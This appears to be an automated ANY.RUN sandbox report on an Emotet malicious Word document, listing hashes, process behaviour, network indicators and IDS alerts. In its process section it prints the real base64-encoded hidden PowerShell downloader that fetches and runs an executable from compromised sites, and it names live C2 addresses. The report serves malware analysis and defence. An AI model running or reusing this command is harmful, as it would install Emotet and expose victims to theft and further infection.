analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

26s49hwr2-3628-2361-k8mtmp-2j7vw8kka

Full analysis: https://app.any.run/tasks/ff35f5ee-eeb8-481e-a848-3406e4ea7204
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 19:46:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Eligendi eligendi libero., Author: Janina Liebich, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 19:34:00 2019, Last Saved Time/Date: Fri Dec 6 19:34:00 2019, Number of Pages: 1, Number of Words: 57, Number of Characters: 331, Security: 0
MD5:

50888D76EE8344C5F1C60344B52B914E

SHA1:

2815FCDFE90806D53211327763174093824468A2

SHA256:

C6F9E4D93E2615F086C36CBFD149B4A0836D3DA0FB7466AA25212B88093DF5DB

SSDEEP:

3072:PAqfqJPGuS2h7J2y/GdyuktGDWLS0HZWD5w8K7NkEyD7IBUFLkRoBdB+zxN:PAqfqJPGuS2hV2k4MtGiL3HJkEyD7bF+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 414.exe (PID: 1528)
      • 414.exe (PID: 2336)
      • serialfunc.exe (PID: 2572)
      • serialfunc.exe (PID: 320)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3176)
    • Emotet process was detected

      • 414.exe (PID: 1528)
    • Connects to CnC server

      • serialfunc.exe (PID: 2572)
    • EMOTET was detected

      • serialfunc.exe (PID: 2572)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3176)
    • Executed via WMI

      • powershell.exe (PID: 3176)
    • PowerShell script executed

      • powershell.exe (PID: 3176)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3176)
      • 414.exe (PID: 1528)
    • Application launched itself

      • 414.exe (PID: 2336)
      • serialfunc.exe (PID: 320)
    • Starts itself from another location

      • 414.exe (PID: 1528)
    • Connects to server without host name

      • serialfunc.exe (PID: 2572)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1704)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1704)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Forms 2.0 Form
CompObjUserTypeLen: 25
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 387
Paragraphs: 1
Lines: 2
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 331
Words: 57
Pages: 1
ModifyDate: 2019:12:06 19:34:00
CreateDate: 2019:12:06 19:34:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Janina Liebich
Subject: -
Title: Eligendi eligendi libero.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 414.exe no specs #EMOTET 414.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
1704"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\26s49hwr2-3628-2361-k8mtmp-2j7vw8kka.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3176powershell -w hidden -en JABLAGEAdgB3AGwAcgB6AGgAPQAnAEUAZgBtAHIAZAB3AG4AdQBkAHUAJwA7ACQARwBqAGUAdwB1AGQAbwBoAHAAYwBsAGYAIAA9ACAAJwA0ADEANAAnADsAJABCAGoAegBtAG0AYQBlAGUAZwB0AHUAagB6AD0AJwBOAG8AcwB6AG0AcwByAG8AcQAnADsAJABQAG0AcAB3AHQAegBvAGIAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBqAGUAdwB1AGQAbwBoAHAAYwBsAGYAKwAnAC4AZQB4AGUAJwA7ACQAVABvAHEAYwBiAHEAZgBlAD0AJwBNAGUAbgBoAHMAaQB4AG0AcgBoAGUAJwA7ACQAUQBtAHoAawBiAHMAZgBvAGoAcwB4AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBiAGMATABJAEUATgB0ADsAJABBAHAAcwB0AHgAZABjAHIAdgBqAGsAZAA9ACcAaAB0AHQAcAA6AC8ALwBiAG8AbwB0AHkAYwBhAG0AcABjAGEAcgBkAGkAZgBmAC4AYwBvAG0ALwB4AGQAdwAyAGYALwBtAGsALwAqAGgAdAB0AHAAOgAvAC8AdABvAG0AbwBtAG8AZwBvAGgAYQBuAC4AYwBvAG0ALwBsAGMAdwB1AHkALwBwAGkANgBlAC8AKgBoAHQAdABwADoALwAvAHMAYQBsAGwAeQBhAGMAdQByAHQAaQBzAC4AYgBpAHoALwB3AHAALQBhAGQAbQBpAG4ALwByAG0ALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBjAGgAaQByAG8ALgB6AGEALgBuAGUAdAAvAHcAcAAtAGEAZABtAGkAbgAvAGgAdQB1AC8AKgBoAHQAdABwADoALwAvAGMAYQBsAGcAYQByAHkAbQBhAGcAaQBjAHMAaABvAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AbgAyADMALwAnAC4AIgBzAGAAcABMAEkAdAAiACgAJwAqACcAKQA7ACQASABwAGMAbAByAGQAagB1AGkAPQAnAEcAcABuAGUAcgBkAGQAdQB6ACcAOwBmAG8AcgBlAGEAYwBoACgAJABVAGkAbQByAG4AYQB4AGQAZABiAHQAIABpAG4AIAAkAEEAcABzAHQAeABkAGMAcgB2AGoAawBkACkAewB0AHIAeQB7ACQAUQBtAHoAawBiAHMAZgBvAGoAcwB4AC4AIgBkAGAAbwBXAG4ATABgAE8AQQBkAEYAYABJAEwARQAiACgAJABVAGkAbQByAG4AYQB4AGQAZABiAHQALAAgACQAUABtAHAAdwB0AHoAbwBiAHoAKQA7ACQASgBlAHMAdQBqAHQAYwB6AD0AJwBQAGcAagBuAHoAZgBvAGEAawBzAGQAcABmACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUABtAHAAdwB0AHoAbwBiAHoAKQAuACIAbABgAEUATgBnAHQASAAiACAALQBnAGUAIAAyADAAMAA5ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAEEAYABSAHQAIgAoACQAUABtAHAAdwB0AHoAbwBiAHoAKQA7ACQAVAB1AG8AZQBqAGUAcQBmAGYAeABzAHgAPQAnAFMAagB6AGkAcgBpAGQAcQByAHkAcAAnADsAYgByAGUAYQBrADsAJABaAHgAdQB6AHMAcgBvAGEAaABsAGwAPQAnAFEAZABoAGMAbgByAGcAdgBhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgB0AHIAYwBkAHAAcABvAHEAcgBoAGwAeAA9ACcARgBwAGwAeQBuAHMAZgBzAGEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2336"C:\Users\admin\414.exe" C:\Users\admin\414.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1528--27f386f5C:\Users\admin\414.exe
414.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
320"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe414.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2572--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Version:
1, 0, 0, 1
Total events
2 272
Read events
1 457
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
1704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB725.tmp.cvr
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4ACA1AE5.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3579BA2.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7647733B.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA4D5C00.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4495AC01.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA3B220E.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7F04EB7.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\966FE94C.wmf
MD5:
SHA256:
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30F20DD.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2572
serialfunc.exe
POST
107.2.2.28:80
http://107.2.2.28/GSjNmMTA
US
malicious
3176
powershell.exe
GET
200
50.87.253.53:80
http://bootycampcardiff.com/xdw2f/mk/
US
executable
492 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3176
powershell.exe
50.87.253.53:80
bootycampcardiff.com
Unified Layer
US
malicious
2572
serialfunc.exe
107.2.2.28:80
Comcast Cable Communications, LLC
US
malicious

DNS requests

Domain
IP
Reputation
bootycampcardiff.com
  • 50.87.253.53
malicious

Threats

PID
Process
Class
Message
3176
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3176
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3176
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2572
serialfunc.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
2572
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
2572
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
2572
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
No debug info